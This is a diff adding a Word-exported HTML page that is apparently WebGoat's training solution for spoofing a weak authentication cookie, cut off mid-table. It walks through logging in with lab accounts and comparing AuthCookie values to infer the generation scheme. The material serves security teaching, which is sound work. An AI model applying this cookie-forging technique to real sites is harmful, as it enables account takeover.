+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]--><!--[if !mso]><object
+ classid="clsid:38481807-CA0E-42D2-BF39-B33AF135CC4D" id=ieooui></object>
+<style>
+st1\:*{behavior:url(#ieooui) }
+</style>
+<![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Cambria;
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1073741899 0 0 159 0;}
+@font-face
+	{font-family:Calibri;
+	panose-1:2 15 5 2 2 2 4 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1073750139 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Spoof an Authentication Cookie <o:p></o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Concept / Topic To Teach: <o:p></o:p></span></b></p>
+
+<!-- Start Instructions -->
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Many
+applications will automatically log a user into their site if the right
+authentication cookie is specified. &nbsp; Some times the cookie values can be
+guessed if the algorithm for generating the cookie can be obtained. &nbsp;Some
+times the cookies are left on the client machine and can be stolen by
+exploiting another system vulnerability. &nbsp;Some times the cookies maybe
+intercepted using Cross site scripting. &nbsp;This lesson tries to make the
+student aware of authentication cookies and presents the student with a way to
+defeat the cookie authentication method in this lesson.<br style='mso-special-character:
+line-break'>
+<![if !supportLineBreakNewLine]><br style='mso-special-character:line-break'>
+<![endif]><o:p></o:p></span></p>
+
+<!-- Stop Instructions -->
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>General Goal(s): <o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The user
+should be able to bypass the authentication check.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<h2><span style='color:windowtext'>Solution:<o:p></o:p></span></h2>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Make sure
+that you have “Show Cookies” enabled in WebGoat. And you need to disable the
+feature “Inject know cookies into requests” in WebScarab otherwise WebScarab
+will always inject your old cookie and not the new cookie.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_596" o:spid="_x0000_i1033" type="#_x0000_t75"
+ style='width:465pt;height:267.75pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=620 height=357
+src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg" v:shapes="Picture_x0020_596"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Disable &quot;Inject known cookies into
+requests&quot;<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_597"
+ o:spid="_x0000_i1032" type="#_x0000_t75" style='width:473.25pt;height:273pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=631 height=364
+src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg" v:shapes="Picture_x0020_597"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Logon with webgoat/webgoat<span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You can login
+with webgoat/webgoat.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_598"
+ o:spid="_x0000_i1031" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg" v:shapes="Picture_x0020_598"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Logged on as webgoat</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Hit
+“Refresh”. This refresh will show our AuthCookie. And you are now authenticated
+using this cookie and not with parameters like above.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_599" o:spid="_x0000_i1030"
+ type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg" v:shapes="Picture_x0020_599"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>There is a
+new cookie called AuthCookie with values 65432ubphcfx. Logout and login with
+aspect/aspect.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_600"
+ o:spid="_x0000_i1029" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image009.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg" v:shapes="Picture_x0020_600"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Logon as aspect/aspect<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_601"
+ o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image011.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg" v:shapes="Picture_x0020_601"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Logged on as aspect<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Hit “Refresh”
+to see the new cookie.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_602"
+ o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image013.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg" v:shapes="Picture_x0020_602"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>6</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Cookie for user aspect<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You have now
+a different cookie value for AuthCookie: 65432udfgfb<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0
+ style='margin-left:39.6pt;border-collapse:collapse;border:none;mso-border-alt:
+ solid windowtext .5pt;mso-yfti-tbllook:1184;mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+ mso-border-insideh:.5pt solid windowtext;mso-border-insidev:.5pt solid windowtext'>
+ <tr style='mso-yfti-irow:0;mso-yfti-firstrow:yes;height:20.25pt'>
+  <td width=216 valign=top style='width:162.0pt;border:solid windowtext 1.0pt;
+  mso-border-alt:solid windowtext .5pt;padding:0cm 5.4pt 0cm 5.4pt;height:20.25pt'>
+  <p class=MsoNormal style='line-height:115%'><span style='font-family:"Arial","sans-serif"'>webgoat<o:p></o:p></span></p>
+  </td>
+  <td width=259 valign=top style='width:194.25pt;border:solid windowtext 1.0pt;
+  border-left:none;mso-border-left-alt:solid windowtext .5pt;mso-border-alt:
